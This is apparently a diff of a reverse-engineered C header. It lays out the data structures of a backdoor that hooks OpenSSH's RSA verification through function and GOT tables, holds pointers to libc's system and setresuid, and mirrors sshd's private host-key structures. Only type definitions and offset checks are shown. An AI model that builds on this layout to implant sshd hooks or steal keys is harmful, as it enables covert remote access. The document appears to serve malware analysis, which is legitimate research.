697  u8 sib_base;
-
698  };
-
699  u32 sib_word;
-
700  };
-
701  };
-
702  PADDING(3);
-
703  u32 opcode;
-
704  PADDING(4);
-
705  u64 mem_disp;
-
706  // e.g. in CALL
-
707  u64 operand;
-
708  u64 operand_zeroextended;
-
709  u64 operand_size;
-
710  u8 insn_offset;
-
711  PADDING(7);
-
712 } dasm_ctx_t;
-
713 
-
714 assert_offset(dasm_ctx_t, instruction, 0);
-
715 assert_offset(dasm_ctx_t, instruction_size, 8);
-
716 assert_offset(dasm_ctx_t, flags, 0x10);
-
717 assert_offset(dasm_ctx_t, flags2, 0x11);
-
718 assert_offset(dasm_ctx_t, lock_rep_byte, 0x14);
-
719 assert_offset(dasm_ctx_t, seg_byte, 0x15);
-
720 assert_offset(dasm_ctx_t, osize_byte, 0x16);
-
721 assert_offset(dasm_ctx_t, asize_byte, 0x17);
-
722 assert_offset(dasm_ctx_t, vex_byte, 0x18);
-
723 assert_offset(dasm_ctx_t, vex_byte2, 0x19);
-
724 assert_offset(dasm_ctx_t, vex_byte3, 0x1A);
-
725 assert_offset(dasm_ctx_t, rex_byte, 0x1B);
-
726 assert_offset(dasm_ctx_t, modrm, 0x1C);
-
727 assert_offset(dasm_ctx_t, modrm_mod, 0x1D);
-
728 assert_offset(dasm_ctx_t, modrm_reg, 0x1E);
-
729 assert_offset(dasm_ctx_t, modrm_rm, 0x1F);
-
730 assert_offset(dasm_ctx_t, imm64_reg, 0x20);
-
731 assert_offset(dasm_ctx_t, sib, 0x21);
-
732 assert_offset(dasm_ctx_t, sib_scale, 0x22);
-
733 assert_offset(dasm_ctx_t, sib_index, 0x23);
-
734 assert_offset(dasm_ctx_t, sib_base, 0x24);
-
735 assert_offset(dasm_ctx_t, opcode, 0x28);
-
736 assert_offset(dasm_ctx_t, mem_disp, 0x30);
-
737 assert_offset(dasm_ctx_t, operand, 0x38);
-
738 assert_offset(dasm_ctx_t, operand_zeroextended, 0x40);
-
739 assert_offset(dasm_ctx_t, operand_size, 0x48);
-
740 assert_offset(dasm_ctx_t, insn_offset, 0x50);
-
741 static_assert(sizeof(dasm_ctx_t) == 0x58);
-
742 
-
743 typedef struct __attribute__((packed)) elf_info {
-
747  Elf64_Ehdr *elfbase;
-
751  u64 first_vaddr;
-
755  Elf64_Phdr *phdrs;
-
759  u64 e_phnum;
-
763  Elf64_Dyn *dyn;
-
767  u64 dyn_num_entries;
-
771  char *strtab;
-
775  Elf64_Sym *symtab;
-
779  Elf64_Rela *plt_relocs;
-
783  u32 plt_relocs_num;
-
789  BOOL gnurelro_found;
-
793  u64 gnurelro_vaddr;
-
797  u64 gnurelro_memsize;
-
801  Elf64_Verdef *verdef;
-
805  u64 verdef_num;
-
806  Elf64_Versym *versym;
-
807  Elf64_Rela *rela_relocs;
-
808  u32 rela_relocs_num;
-
809  u32 _unused0;
-
810  Elf64_Relr *relr_relocs;
-
811  u32 relr_relocs_num;
-
812  PADDING(4);
-
817  u64 code_segment_start;
-
822  u64 code_segment_size;
-
823 
-
824  u64 rodata_segment_start;
-
825  u64 rodata_segment_size;
-
826  u64 data_segment_start;
-
827  u64 data_segment_size;
-
828  u64 data_segment_alignment;
-
829 
-
830  u8 flags;
-
831  PADDING(7);
-
835  u32 gnu_hash_nbuckets;
-
839  u32 gnu_hash_last_bloom;
-
840  u32 gnu_hash_bloom_shift;
-
841  PADDING(4);
-
842  u64 *gnu_hash_bloom;
-
843  u32 *gnu_hash_buckets;
-
844  u32 *gnu_hash_chain;
-
845 } elf_info_t;
-
846 
-
847 assert_offset(elf_info_t, elfbase, 0x0);
-
848 assert_offset(elf_info_t, first_vaddr, 0x8);
-
849 assert_offset(elf_info_t, phdrs, 0x10);
-
850 assert_offset(elf_info_t, e_phnum, 0x18);
-
851 assert_offset(elf_info_t, dyn, 0x20);
-
852 assert_offset(elf_info_t, dyn_num_entries, 0x28);
-
853 assert_offset(elf_info_t, strtab, 0x30);
-
854 assert_offset(elf_info_t, symtab, 0x38);
-
855 assert_offset(elf_info_t, plt_relocs, 0x40);
-
856 assert_offset(elf_info_t, plt_relocs_num, 0x48);
-
857 assert_offset(elf_info_t, gnurelro_found, 0x4C);
-
858 assert_offset(elf_info_t, gnurelro_vaddr, 0x50);
-
859 assert_offset(elf_info_t, gnurelro_memsize, 0x58);
-
860 assert_offset(elf_info_t, verdef, 0x60);
-
861 assert_offset(elf_info_t, verdef_num, 0x68);
-
862 assert_offset(elf_info_t, versym, 0x70);
-
863 assert_offset(elf_info_t, rela_relocs, 0x78);
-
864 assert_offset(elf_info_t, rela_relocs_num, 0x80);
-
865 assert_offset(elf_info_t, relr_relocs, 0x88);
-
866 assert_offset(elf_info_t, relr_relocs_num, 0x90);
-
867 assert_offset(elf_info_t, code_segment_start, 0x98);
-
868 assert_offset(elf_info_t, code_segment_size, 0xA0);
-
869 assert_offset(elf_info_t, rodata_segment_start, 0xA8);
-
870 assert_offset(elf_info_t, rodata_segment_size, 0xB0);
-
871 assert_offset(elf_info_t, data_segment_start, 0xB8);
-
872 assert_offset(elf_info_t, data_segment_size, 0xC0);
-
873 assert_offset(elf_info_t, data_segment_alignment, 0xC8);
-
874 assert_offset(elf_info_t, flags, 0xD0);
-
875 assert_offset(elf_info_t, gnu_hash_nbuckets, 0xd8);
-
876 assert_offset(elf_info_t, gnu_hash_last_bloom, 0xdc);
-
877 assert_offset(elf_info_t, gnu_hash_bloom_shift, 0xe0);
-
878 assert_offset(elf_info_t, gnu_hash_bloom, 0xe8);
-
879 assert_offset(elf_info_t, gnu_hash_buckets, 0xf0);
-
880 assert_offset(elf_info_t, gnu_hash_chain, 0xf8);
-
881 static_assert(sizeof(elf_info_t) == 0x100);
-
882 
-
883 typedef struct __attribute__((packed)) libc_imports {
-
884  u32 resolved_imports_count;
-
885  PADDING(4);
-
886  size_t (*malloc_usable_size)(void *ptr);
-
887  uid_t (*getuid)(void);
-
888  void (*exit)(int status);
-
889  int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
-
890  int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
-
891  int (*system)(const char *command);
-
892  ssize_t (*write)(int fd, const void *buf, size_t count);
-
893  int (*pselect)(
-
894  int nfds, fd_set *readfds, fd_set *writefds,
-
895  fd_set *exceptfds, const struct timespec *timeout,
-
896  const sigset_t *sigmask);
-
897  ssize_t (*read)(int fd, void *buf, size_t count);
-
898  int *(*__errno_location)(void);
-
899  int (*setlogmask)(int mask);
-
900  int (*shutdown)(int sockfd, int how);
-
901  void *__libc_stack_end;
-
902 } libc_imports_t;
-
903 
-
904 assert_offset(libc_imports_t, resolved_imports_count, 0);
-
905 assert_offset(libc_imports_t, malloc_usable_size, 8);
-
906 assert_offset(libc_imports_t, getuid, 0x10);
-
907 assert_offset(libc_imports_t, exit, 0x18);
-
908 assert_offset(libc_imports_t, setresgid, 0x20);
-
909 assert_offset(libc_imports_t, setresuid, 0x28);
-
910 assert_offset(libc_imports_t, system, 0x30);
-
911 assert_offset(libc_imports_t, write, 0x38);
-
912 assert_offset(libc_imports_t, pselect, 0x40);
-
913 assert_offset(libc_imports_t, read, 0x48);
-
914 assert_offset(libc_imports_t, __errno_location, 0x50);
-
915 assert_offset(libc_imports_t, setlogmask, 0x58);
-
916 assert_offset(libc_imports_t, shutdown, 0x60);
-
917 static_assert(sizeof(libc_imports_t) == 0x70);
-
918 
-
919 typedef int (*pfn_RSA_public_decrypt_t)(
-
920  int flen, unsigned char *from, unsigned char *to,
-
921  RSA *rsa, int padding);
-
922 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey, struct rsa_st *key);
-
923 typedef void (*pfn_RSA_get0_key_t)(
-
924  const RSA *r,
-
925  const BIGNUM **n, const BIGNUM **e, const BIGNUM **d);
-
926 
-
927 typedef struct __attribute__((packed)) imported_funcs {
-
928  pfn_RSA_public_decrypt_t RSA_public_decrypt;
-
929  pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
-
930  // ???
-
931  void (*RSA_get0_key_null)(
-
932  const RSA *r, const BIGNUM **n,
-
933  const BIGNUM **e, const BIGNUM **d);
-
938  void *RSA_public_decrypt_plt;
-
943  void *EVP_PKEY_set1_RSA_plt;
-
948  void *RSA_get0_key_plt;
-
949  void (*DSA_get0_pqg)(
-
950  const DSA *d, const BIGNUM **p,
-
951  const BIGNUM **q, const BIGNUM **g);
-
952  const BIGNUM *(*DSA_get0_pub_key)(const DSA *d);
-
953  size_t (*EC_POINT_point2oct)(
-
954  const EC_GROUP *group, const EC_POINT *p,
-
955  point_conversion_form_t form, unsigned char *buf,
-
956  size_t len, BN_CTX *ctx);
-
957  EC_POINT *(*EC_KEY_get0_public_key)(const EC_KEY *key);
-
958  const EC_GROUP *(*EC_KEY_get0_group)(const EC_KEY *key);
-
959  EVP_MD *(*EVP_sha256)(void);
-
960  pfn_RSA_get0_key_t RSA_get0_key;
-
961  int (*BN_num_bits)(const BIGNUM *a);
-
962  EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
-
963  int type, ENGINE *e,
-
964  const unsigned char *key, size_t keylen);
-
965  EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
-
966  int (*EVP_DigestVerifyInit)(
-
967  EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
-
968  const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
-
969  int (*EVP_DigestVerify)(
-
970  EVP_MD_CTX *ctx, const unsigned char *sig,
-
971  size_t siglen, const unsigned char *tbs, size_t tbslen);
-
972  void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
-
973  void (*EVP_PKEY_free)(EVP_PKEY *key);
-
974  EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
-
975  int (*EVP_DecryptInit_ex)(
-
976  EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
-
977  ENGINE *impl, const unsigned char *key, const unsigned char *iv);
-
978  int (*EVP_DecryptUpdate)(
-
979  EVP_CIPHER_CTX *ctx, unsigned char *out,
-
980  int *outl, const unsigned char *in, int inl);
-
981  int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-
982  void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
-
983  const EVP_CIPHER *(*EVP_chacha20)(void);
-
984  RSA *(*RSA_new)(void);
-
985  BIGNUM *(*BN_dup)(const BIGNUM *from);
-
986  BIGNUM (*BN_bin2bn)(const unsigned char *s, int len, BIGNUM *ret);
-
987  int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
-
988  int (*EVP_Digest)(
-
989  const void *data, size_t count, unsigned char *md,
-
990  unsigned int *size, const EVP_MD *type, ENGINE *impl);
-
991  int (*RSA_sign)(
-
992  int type,
-
993  const unsigned char *m, unsigned int m_len,
-
994  unsigned char *sigret, unsigned int *siglen, RSA *rsa);
-
995  int (*BN_bn2bin)(const BIGNUM *a, unsigned char *to);
-
996  void (*RSA_free)(RSA *rsa);
-
997  void (*BN_free)(BIGNUM *a);
-
998  libc_imports_t *libc;
-
999  u64 resolved_imports_count;
-
1000 } imported_funcs_t;
-
1001 
-
1002 assert_offset(imported_funcs_t, RSA_public_decrypt, 0);
-
1003 assert_offset(imported_funcs_t, EVP_PKEY_set1_RSA, 8);
-
1004 assert_offset(imported_funcs_t, RSA_get0_key_null, 0x10);
-
1005 assert_offset(imported_funcs_t, RSA_public_decrypt_plt, 0x18);
-
1006 assert_offset(imported_funcs_t, EVP_PKEY_set1_RSA_plt, 0x20);
-
1007 assert_offset(imported_funcs_t, RSA_get0_key_plt, 0x28);
-
1008 assert_offset(imported_funcs_t, DSA_get0_pqg, 0x30);
-
1009 assert_offset(imported_funcs_t, DSA_get0_pub_key, 0x38);
-
1010 assert_offset(imported_funcs_t, EC_POINT_point2oct, 0x40);
-
1011 assert_offset(imported_funcs_t, EC_KEY_get0_public_key, 0x48);
-
1012 assert_offset(imported_funcs_t, EC_KEY_get0_group, 0x50);
-
1013 assert_offset(imported_funcs_t, EVP_sha256, 0x58);
-
1014 assert_offset(imported_funcs_t, RSA_get0_key, 0x60);
-
1015 assert_offset(imported_funcs_t, BN_num_bits, 0x68);
-
1016 assert_offset(imported_funcs_t, EVP_PKEY_new_raw_public_key, 0x70);
-
1017 assert_offset(imported_funcs_t, EVP_MD_CTX_new, 0x78);
-
1018 assert_offset(imported_funcs_t, EVP_DigestVerifyInit, 0x80);
-
1019 assert_offset(imported_funcs_t, EVP_DigestVerify, 0x88);
-
1020 assert_offset(imported_funcs_t, EVP_MD_CTX_free, 0x90);
-
1021 assert_offset(imported_funcs_t, EVP_PKEY_free, 0x98);
-
1022 assert_offset(imported_funcs_t, EVP_CIPHER_CTX_new, 0xA0);
-
1023 assert_offset(imported_funcs_t, EVP_DecryptInit_ex, 0xA8);
-
1024 assert_offset(imported_funcs_t, EVP_DecryptUpdate, 0xB0);
-
1025 assert_offset(imported_funcs_t, EVP_DecryptFinal_ex, 0xB8);
-
1026 assert_offset(imported_funcs_t, EVP_CIPHER_CTX_free, 0xC0);
-
1027 assert_offset(imported_funcs_t, EVP_chacha20, 0xC8);
-
1028 assert_offset(imported_funcs_t, RSA_new, 0xD0);
-
1029 assert_offset(imported_funcs_t, BN_dup, 0xD8);
-
1030 assert_offset(imported_funcs_t, BN_bin2bn, 0xE0);
-
1031 assert_offset(imported_funcs_t, RSA_set0_key, 0xE8);
-
1032 assert_offset(imported_funcs_t, EVP_Digest, 0xF0);
-
1033 assert_offset(imported_funcs_t, RSA_sign, 0xF8);
-
1034 assert_offset(imported_funcs_t, BN_bn2bin, 0x100);
-
1035 assert_offset(imported_funcs_t, RSA_free, 0x108);
-
1036 assert_offset(imported_funcs_t, BN_free, 0x110);
-
1037 assert_offset(imported_funcs_t, libc, 0x118);
-
1038 assert_offset(imported_funcs_t, resolved_imports_count, 0x120);
-
1039 static_assert(sizeof(imported_funcs_t) == 0x128);
-
1040 
-
1041 struct ssh;
-
1042 struct sshbuf;
+
544 struct sshbuf;
+
545 struct kex;
+
546 
+
547 /* permit_root_login */
+
548 #define PERMIT_NOT_SET -1
+
549 #define PERMIT_NO 0
+
550 #define PERMIT_FORCED_ONLY 1
+
551 #define PERMIT_NO_PASSWD 2
+
552 #define PERMIT_YES 3
+
553 
+
557 struct monitor {
+
558  int m_recvfd;
+
559  int m_sendfd;
+
560  int m_log_recvfd;
+
561  int m_log_sendfd;
+
562  struct kex **m_pkex;
+
563  pid_t m_pid;
+
564 };
+
565 
+
569 struct sensitive_data {
+
570  struct sshkey **host_keys; /* all private host keys */
+
571  struct sshkey **host_pubkeys; /* all public host keys */
+
572  struct sshkey **host_certificates; /* all public host certificates */
+
573  int have_ssh2_key;
+
574 };
+
575 
+
580 struct sshkey {
+
581  int type;
+
582  int flags;
+
583  /* KEY_RSA */
+
584  RSA *rsa;
+
585  /* KEY_DSA */
+
586  DSA *dsa;
+
587  /* KEY_ECDSA and KEY_ECDSA_SK */
+
588  int ecdsa_nid; /* NID of curve */
+
589  EC_KEY *ecdsa;
+
590  /* KEY_ED25519 and KEY_ED25519_SK */
+
591  u8 *ed25519_sk;
+
592  u8 *ed25519_pk;
+
593  /* KEY_XMSS */
+
594  char *xmss_name;
+
595  char *xmss_filename; /* for state file updates */
+
596  void *xmss_state; /* depends on xmss_name, opaque */
+
597  u8 *xmss_sk;
+
598  u8 *xmss_pk;
+
599  /* KEY_ECDSA_SK and KEY_ED25519_SK */
+
600  char sk_application;
+
601  u8 sk_flags;
+
602  struct sshbuf *sk_key_handle;
+
603  struct sshbuf *sk_reserved;
+
604  /* Certificates */
+
605  struct sshkey_cert *cert;
+
606  /* Private key shielding */
+
607  u8 *shielded_private;
+
608  size_t shielded_len;
+
609  u8 *shield_prekey;
+
610  size_t shield_prekey_len;
+
611 };
+
612 
+
613 typedef struct __attribute__((packed)) got_ctx {
+
617  void *got_ptr;
+
624  void *return_address;
+
628  void *cpuid_fn;
+
633  ptrdiff_t got_offset;
+
634 } got_ctx_t;
+
635 
+
636 assert_offset(got_ctx_t, got_ptr, 0);
+
637 assert_offset(got_ctx_t, return_address, 0x8);
+
638 assert_offset(got_ctx_t, cpuid_fn, 0x10);
+
639 assert_offset(got_ctx_t, got_offset, 0x18);
+
640 static_assert(sizeof(got_ctx_t) == 0x20);
+
641 
+
642 typedef struct __attribute__((packed)) elf_entry_ctx {
+
647  void *symbol_ptr;
+
648  got_ctx_t got_ctx;
+
652  u64 *frame_address;
+
653 } elf_entry_ctx_t;
+
654 
+
655 assert_offset(elf_entry_ctx_t, symbol_ptr, 0);
+
656 assert_offset(elf_entry_ctx_t, got_ctx, 0x8);
+
657 assert_offset(elf_entry_ctx_t, frame_address, 0x28);
+
658 
+
659 typedef struct __attribute__((packed)) dasm_ctx {
+
660  u8* instruction;
+
661  u64 instruction_size;
+
662  union {
+
663  struct __attribute__((packed)) {
+
667  u8 flags;
+
671  u8 flags2;
+
672  PADDING(2);
+
673  u8 lock_rep_byte;
+
674  u8 seg_byte;
+
675  u8 osize_byte;
+
676  u8 asize_byte;
+
677  u8 vex_byte;
+
678  u8 vex_byte2;
+
679  u8 vex_byte3;
+
680  u8 rex_byte;
+
681  union {
+
682  struct __attribute__((packed)) {
+
683  u8 modrm;
+
684  u8 modrm_mod;
+
685  u8 modrm_reg;
+
686  u8 modrm_rm;
+
687  };
+
688  u32 modrm_word;
+
689  };
+
690  };
+
691  u16 flags_u16;
+
692  };
+
693  u8 imm64_reg; // low 3 bits only
+
694  struct __attribute__((packed)) {
+
695  union {
+
696  struct __attribute__((packed)) {
+
697  u8 sib;
+
698  u8 sib_scale;
+
699  u8 sib_index;
+
700  u8 sib_base;
+
701  };
+
702  u32 sib_word;
+
703  };
+
704  };
+
705  PADDING(3);
+
706  u32 opcode;
+
707  PADDING(4);
+
708  u64 mem_disp;
+
709  // e.g. in CALL
+
710  u64 operand;
+
711  u64 operand_zeroextended;
+
712  u64 operand_size;
+
713  u8 insn_offset;
+
714  PADDING(7);
+
715 } dasm_ctx_t;
+
716 
+
717 assert_offset(dasm_ctx_t, instruction, 0);
+
718 assert_offset(dasm_ctx_t, instruction_size, 8);
+
719 assert_offset(dasm_ctx_t, flags, 0x10);
+
720 assert_offset(dasm_ctx_t, flags2, 0x11);
+
721 assert_offset(dasm_ctx_t, lock_rep_byte, 0x14);
+
722 assert_offset(dasm_ctx_t, seg_byte, 0x15);
+
723 assert_offset(dasm_ctx_t, osize_byte, 0x16);
+
724 assert_offset(dasm_ctx_t, asize_byte, 0x17);
+
725 assert_offset(dasm_ctx_t, vex_byte, 0x18);
+
726 assert_offset(dasm_ctx_t, vex_byte2, 0x19);
+
727 assert_offset(dasm_ctx_t, vex_byte3, 0x1A);
+
728 assert_offset(dasm_ctx_t, rex_byte, 0x1B);
+
729 assert_offset(dasm_ctx_t, modrm, 0x1C);
+
730 assert_offset(dasm_ctx_t, modrm_mod, 0x1D);
+
731 assert_offset(dasm_ctx_t, modrm_reg, 0x1E);
+
732 assert_offset(dasm_ctx_t, modrm_rm, 0x1F);
+
733 assert_offset(dasm_ctx_t, imm64_reg, 0x20);
+
734 assert_offset(dasm_ctx_t, sib, 0x21);
+
735 assert_offset(dasm_ctx_t, sib_scale, 0x22);
+
736 assert_offset(dasm_ctx_t, sib_index, 0x23);
+
737 assert_offset(dasm_ctx_t, sib_base, 0x24);
+
738 assert_offset(dasm_ctx_t, opcode, 0x28);
+
739 assert_offset(dasm_ctx_t, mem_disp, 0x30);
+
740 assert_offset(dasm_ctx_t, operand, 0x38);
+
741 assert_offset(dasm_ctx_t, operand_zeroextended, 0x40);
+
742 assert_offset(dasm_ctx_t, operand_size, 0x48);
+
743 assert_offset(dasm_ctx_t, insn_offset, 0x50);
+
744 static_assert(sizeof(dasm_ctx_t) == 0x58);
+
745 
+
746 typedef struct __attribute__((packed)) elf_info {
+
750  Elf64_Ehdr *elfbase;
+
754  u64 first_vaddr;
+
758  Elf64_Phdr *phdrs;
+
762  u64 e_phnum;
+
766  Elf64_Dyn *dyn;
+
770  u64 dyn_num_entries;
+
774  char *strtab;
+
778  Elf64_Sym *symtab;
+
782  Elf64_Rela *plt_relocs;
+
786  u32 plt_relocs_num;
+
792  BOOL gnurelro_found;
+
796  u64 gnurelro_vaddr;
+
800  u64 gnurelro_memsize;
+
804  Elf64_Verdef *verdef;
+
808  u64 verdef_num;
+
809  Elf64_Versym *versym;
+
810  Elf64_Rela *rela_relocs;
+
811  u32 rela_relocs_num;
+
812  u32 _unused0;
+
813  Elf64_Relr *relr_relocs;
+
814  u32 relr_relocs_num;
+
815  PADDING(4);
+
820  u64 code_segment_start;
+
825  u64 code_segment_size;
+
826 
+
827  u64 rodata_segment_start;
+
828  u64 rodata_segment_size;
+
829  u64 data_segment_start;
+
830  u64 data_segment_size;
+
831  u64 data_segment_alignment;
+
832 
+
833  u8 flags;
+
834  PADDING(7);
+
838  u32 gnu_hash_nbuckets;
+
842  u32 gnu_hash_last_bloom;
+
843  u32 gnu_hash_bloom_shift;
+
844  PADDING(4);
+
845  u64 *gnu_hash_bloom;
+
846  u32 *gnu_hash_buckets;
+
847  u32 *gnu_hash_chain;
+
848 } elf_info_t;
+
849 
+
850 assert_offset(elf_info_t, elfbase, 0x0);
+
851 assert_offset(elf_info_t, first_vaddr, 0x8);
+
852 assert_offset(elf_info_t, phdrs, 0x10);
+
853 assert_offset(elf_info_t, e_phnum, 0x18);
+
854 assert_offset(elf_info_t, dyn, 0x20);
+
855 assert_offset(elf_info_t, dyn_num_entries, 0x28);
+
856 assert_offset(elf_info_t, strtab, 0x30);
+
857 assert_offset(elf_info_t, symtab, 0x38);
+
858 assert_offset(elf_info_t, plt_relocs, 0x40);
+
859 assert_offset(elf_info_t, plt_relocs_num, 0x48);
+
860 assert_offset(elf_info_t, gnurelro_found, 0x4C);
+
861 assert_offset(elf_info_t, gnurelro_vaddr, 0x50);
+
862 assert_offset(elf_info_t, gnurelro_memsize, 0x58);
+
863 assert_offset(elf_info_t, verdef, 0x60);
+
864 assert_offset(elf_info_t, verdef_num, 0x68);
+
865 assert_offset(elf_info_t, versym, 0x70);
+
866 assert_offset(elf_info_t, rela_relocs, 0x78);
+
867 assert_offset(elf_info_t, rela_relocs_num, 0x80);
+
868 assert_offset(elf_info_t, relr_relocs, 0x88);
+
869 assert_offset(elf_info_t, relr_relocs_num, 0x90);
+
870 assert_offset(elf_info_t, code_segment_start, 0x98);
+
871 assert_offset(elf_info_t, code_segment_size, 0xA0);
+
872 assert_offset(elf_info_t, rodata_segment_start, 0xA8);
+
873 assert_offset(elf_info_t, rodata_segment_size, 0xB0);
+
874 assert_offset(elf_info_t, data_segment_start, 0xB8);
+
875 assert_offset(elf_info_t, data_segment_size, 0xC0);
+
876 assert_offset(elf_info_t, data_segment_alignment, 0xC8);
+
877 assert_offset(elf_info_t, flags, 0xD0);
+
878 assert_offset(elf_info_t, gnu_hash_nbuckets, 0xd8);
+
879 assert_offset(elf_info_t, gnu_hash_last_bloom, 0xdc);
+
880 assert_offset(elf_info_t, gnu_hash_bloom_shift, 0xe0);
+
881 assert_offset(elf_info_t, gnu_hash_bloom, 0xe8);
+
882 assert_offset(elf_info_t, gnu_hash_buckets, 0xf0);
+
883 assert_offset(elf_info_t, gnu_hash_chain, 0xf8);
+
884 static_assert(sizeof(elf_info_t) == 0x100);
+
885 
+
886 typedef struct __attribute__((packed)) libc_imports {
+
887  u32 resolved_imports_count;
+
888  PADDING(4);
+
889  size_t (*malloc_usable_size)(void *ptr);
+
890  uid_t (*getuid)(void);
+
891  void (*exit)(int status);
+
892  int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
+
893  int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
+
894  int (*system)(const char *command);
+
895  ssize_t (*write)(int fd, const void *buf, size_t count);
+
896  int (*pselect)(
+
897  int nfds, fd_set *readfds, fd_set *writefds,
+
898  fd_set *exceptfds, const struct timespec *timeout,
+
899  const sigset_t *sigmask);
+
900  ssize_t (*read)(int fd, void *buf, size_t count);
+
901  int *(*__errno_location)(void);
+
902  int (*setlogmask)(int mask);
+
903  int (*shutdown)(int sockfd, int how);
+
904  void *__libc_stack_end;
+
905 } libc_imports_t;
+
906 
+
907 assert_offset(libc_imports_t, resolved_imports_count, 0);
+
908 assert_offset(libc_imports_t, malloc_usable_size, 8);
+
909 assert_offset(libc_imports_t, getuid, 0x10);
+
910 assert_offset(libc_imports_t, exit, 0x18);
+
911 assert_offset(libc_imports_t, setresgid, 0x20);
+
912 assert_offset(libc_imports_t, setresuid, 0x28);
+
913 assert_offset(libc_imports_t, system, 0x30);
+
914 assert_offset(libc_imports_t, write, 0x38);
+
915 assert_offset(libc_imports_t, pselect, 0x40);
+
916 assert_offset(libc_imports_t, read, 0x48);
+
917 assert_offset(libc_imports_t, __errno_location, 0x50);
+
918 assert_offset(libc_imports_t, setlogmask, 0x58);
+
919 assert_offset(libc_imports_t, shutdown, 0x60);
+
920 static_assert(sizeof(libc_imports_t) == 0x70);
+
921 
+
922 typedef int (*pfn_RSA_public_decrypt_t)(
+
923  int flen, unsigned char *from, unsigned char *to,
+
924  RSA *rsa, int padding);
+
925 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey, struct rsa_st *key);
+
926 typedef void (*pfn_RSA_get0_key_t)(
+
927  const RSA *r,
+
928  const BIGNUM **n, const BIGNUM **e, const BIGNUM **d);
+
929 
+
930 typedef struct __attribute__((packed)) imported_funcs {
+
931  pfn_RSA_public_decrypt_t RSA_public_decrypt;
+
932  pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
+
933  // ???
+
934  void (*RSA_get0_key_null)(
+
935  const RSA *r, const BIGNUM **n,
+
936  const BIGNUM **e, const BIGNUM **d);
+
941  void *RSA_public_decrypt_plt;
+
946  void *EVP_PKEY_set1_RSA_plt;
+
951  void *RSA_get0_key_plt;
+
952  void (*DSA_get0_pqg)(
+
953  const DSA *d, const BIGNUM **p,
+
954  const BIGNUM **q, const BIGNUM **g);
+
955  const BIGNUM *(*DSA_get0_pub_key)(const DSA *d);
+
956  size_t (*EC_POINT_point2oct)(
+
957  const EC_GROUP *group, const EC_POINT *p,
+
958  point_conversion_form_t form, unsigned char *buf,
+
959  size_t len, BN_CTX *ctx);
+
960  EC_POINT *(*EC_KEY_get0_public_key)(const EC_KEY *key);
+
961  const EC_GROUP *(*EC_KEY_get0_group)(const EC_KEY *key);
+
962  EVP_MD *(*EVP_sha256)(void);
+
963  pfn_RSA_get0_key_t RSA_get0_key;
+
964  int (*BN_num_bits)(const BIGNUM *a);
+
965  EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
+
966  int type, ENGINE *e,
+
967  const unsigned char *key, size_t keylen);
+
968  EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
+
969  int (*EVP_DigestVerifyInit)(
+
970  EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+
971  const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
+
972  int (*EVP_DigestVerify)(
+
973  EVP_MD_CTX *ctx, const unsigned char *sig,
+
974  size_t siglen, const unsigned char *tbs, size_t tbslen);
+
975  void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
+
976  void (*EVP_PKEY_free)(EVP_PKEY *key);
+
977  EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
+
978  int (*EVP_DecryptInit_ex)(
+
979  EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+
980  ENGINE *impl, const unsigned char *key, const unsigned char *iv);
+
981  int (*EVP_DecryptUpdate)(
+
982  EVP_CIPHER_CTX *ctx, unsigned char *out,
+
983  int *outl, const unsigned char *in, int inl);
+
984  int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
+
985  void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
+
986  const EVP_CIPHER *(*EVP_chacha20)(void);
+
987  RSA *(*RSA_new)(void);
+
988  BIGNUM *(*BN_dup)(const BIGNUM *from);
+
989  BIGNUM (*BN_bin2bn)(const unsigned char *s, int len, BIGNUM *ret);
+
990  int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
+
991  int (*EVP_Digest)(
+
992  const void *data, size_t count, unsigned char *md,
+
993  unsigned int *size, const EVP_MD *type, ENGINE *impl);
+
994  int (*RSA_sign)(
+
995  int type,
+
996  const unsigned char *m, unsigned int m_len,
+
997  unsigned char *sigret, unsigned int *siglen, RSA *rsa);
+
998  int (*BN_bn2bin)(const BIGNUM *a, unsigned char *to);
+
999  void (*RSA_free)(RSA *rsa);
+
1000  void (*BN_free)(BIGNUM *a);
+
1001  libc_imports_t *libc;
+
1002  u64 resolved_imports_count;
+
1003 } imported_funcs_t;
+
1004 
+
1005 assert_offset(imported_funcs_t, RSA_public_decrypt, 0);
+
1006 assert_offset(imported_funcs_t, EVP_PKEY_set1_RSA, 8);
+
1007 assert_offset(imported_funcs_t, RSA_get0_key_null, 0x10);
+
1008 assert_offset(imported_funcs_t, RSA_public_decrypt_plt, 0x18);
+
1009 assert_offset(imported_funcs_t, EVP_PKEY_set1_RSA_plt, 0x20);
+
1010 assert_offset(imported_funcs_t, RSA_get0_key_plt, 0x28);
+
1011 assert_offset(imported_funcs_t, DSA_get0_pqg, 0x30);
+
1012 assert_offset(imported_funcs_t, DSA_get0_pub_key, 0x38);
+
1013 assert_offset(imported_funcs_t, EC_POINT_point2oct, 0x40);
+
1014 assert_offset(imported_funcs_t, EC_KEY_get0_public_key, 0x48);
+
